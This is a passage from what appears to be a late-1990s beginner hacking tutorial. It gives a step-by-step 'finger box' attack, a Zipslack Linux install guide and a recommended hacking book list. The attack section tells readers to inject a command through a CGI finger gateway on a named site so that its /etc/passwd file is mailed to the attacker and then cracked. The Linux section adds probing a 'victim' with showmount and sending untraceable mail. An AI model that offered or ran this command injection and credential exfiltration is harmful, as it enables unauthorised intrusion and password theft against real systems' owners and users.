</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">FINGER BOX HACKING:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">In the Anonymizer, assuming that the server's name starts with www, type www.</span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">froggy.com.au /cgi-bin/finger</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div style="border-color: -moz-use-text-color -moz-use-text-color black; border-style: none none double; border-width: medium medium 1.5pt; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Top of Form 5<o:p></o:p></span></div></div><div align="center" style="color: #eeeeee;"><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: medium none;"><tbody>
<tr> <td style="border: medium none; padding: 0cm; width: 72.5pt;" valign="top" width="97"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">OVERLORD ANONYMIZER</span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> </span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div></td> <td style="border: medium none; padding: 0cm; width: 72.5pt;" valign="top" width="97"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div></td> </tr>
</tbody></table></div><div style="border-color: black -moz-use-text-color -moz-use-text-color; border-style: double none none; border-width: 1.5pt medium medium; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Bottom of Form 5<o:p></o:p></span></div></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@</span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">froggy.com.au ", and that your email address is "your@email.org")</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">kangaroo@</span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">froggy.com.au ; /bin/mail your@email.org < etc/passwd</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">This takes the passwd file through </span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.</span><span style="font-family: "Times New Roman","serif"; font-size: 9pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, it didn't work</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Yes! I Got Me Some Encrypted Passwords!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">LINUX INSTALLATION</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive!</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">1/ </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Download this file <ftp: distributions="" linux="" pub="" slackware="" sunsite.anu.edu.au="" zipslack.zip="" zipslack=""></ftp:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> (Australia). It's big, like 34MB. But it's all you need. If the site there is overloaded, get it </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">here <ftp: ftp.cdrom.com="" linux="" pub="" slackware="" zipslack.zip="" zipslack=""></ftp:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 18pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 18pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">\linux\loadlin \linux\vmlinuz root=/dev/hdc1</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">12/ You have an operating system just like all the big net servers have!</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">14/ Now you will have a black screen with a # looking at you. Dont let that worry you - its just like a MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like dos), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">15/ Now, type 'setup'.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">16/ Setup your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">17/ Now, if you want net access, through this - type 'pppsetup'. This starts the ppp (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you dont know these, go back to windows and see what values you used from the Control Panel : Internet section.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">19/ If you are having modem troubles, type 'mc to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these setting in. Then, edit S.rc and at the bottom, uncomment the place where it says to call the serials.rc file.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">22/ Well, you are missing a Windows type interface. You dont need one. But if you want to surf using Linux, etc. It is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena as a browser. These run thru X-Windows.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some looks almost identical to Win95.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Some last incentives, if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the things. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Fact is, when you got this all working for a few weeks (and probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If you are happy buying through Amazon.Com, </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">here is <http: 0789717468="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> the best Linux deal I've been able to find anywhere. It deals with the 3 major Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very good install guide. All for about half the price of the single 'official' RedHat CD. If you like this Linux stuff, I recommend you get it - or at least make sure you get a book that is written very recently.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;">[an error occurred while processing this directive]<o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, it didn't work</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Yes! I Got Me Some Encrypted Passwords!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">CURRENT LIMIT:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE ESSENTIAL HACKER'S LIBRARY:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">ESSENTIAL BOOKS:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">1. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">MAXIMUM SECURITY <http: 1575212684="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: Of course, Maximum Security has to be at number one. I guess this would probably be the central book in any hacker's library. Goes through a heap of techniques like a textbook with over 900 pages.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">2. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE HAPPY HACKER <http: 0929408217="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: Essential for newbies. Although this book is bagged a lot by people who hate Carolyn, I think most people agree it would be the perfect first book a newbie should read. Explains things pretty well, spelling mistakes, but probably an essential newbie primer. Thou, as I say, if you know your stuff you can safely forget this one.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">ESSENTIAL SOFTWARE:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">1. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">LINUX <http: 0789717468="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: You will <i>need</i> to change to Linux to do any serious hacking. But thankfully, it is fairly simple and you can just set up Linux in a seperate partition on your Hard Drive and set for a dual boot option: usually windows, and when you are hacking, Linux. You amount of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest version not an obsolete one. There are also several different 'flavours' of Linux, you will probably want to start with RedHat, then possibly move to Slackware after a year or so. So, make sure you get a deal which gives you the oportunity to check out some of the different distributions. <i>By far</i> the best Linux deal I've found around </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">is this one <http: 0789717468="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">. It has an excellent Linux manual, and comes with three seperate Linux distributions on 3 CDs, including the very latest RedHat <i>and</i> Slackware. It's also excellent value (about half the price of buying the single 'official' RedHat CD).</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">NOT ESSENTIAL, BUT RECOMMENDED BOOKS:<br />
(These books are mainly just part of the Hacker Culture)</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">3. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE WATCHMAN <http: 0316528579="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you anything, so stuff it if you just want to learn. Although it was one of the best reads I ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about the same, but this one deals a lot with phreaking, and scamming radio stations of cars. But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn stuff.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">4. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE FUGITIVE GAME <http: 0316528692="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: Online With Kevin Mitnick: Again, a really fun read (though, I prefer the Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here because it is such a good read. It's also a really cheap buy.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">5. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">TAKEDOWN <http: 0786889136="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> : The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story (written by the cops who chased him). Interesting, but the essential Mitnick book is the one above. Though, this is a very good primer on how the FBI operates to capture hackers. But, again, no techniqes listed. For techniques, you would only have luck in the first two books listed.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Some books that suck: these are some books that are going around that are a rip-off. </span><u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">SECRETS OF A SUPER HACKER <http: 1559501065="" asin="" exec="" obidos="" thenewbiesarea="" www.amazon.com=""></http:></span></u><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">: This is another book that a lot of people have. The book seemed like a real waste of time to me.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and 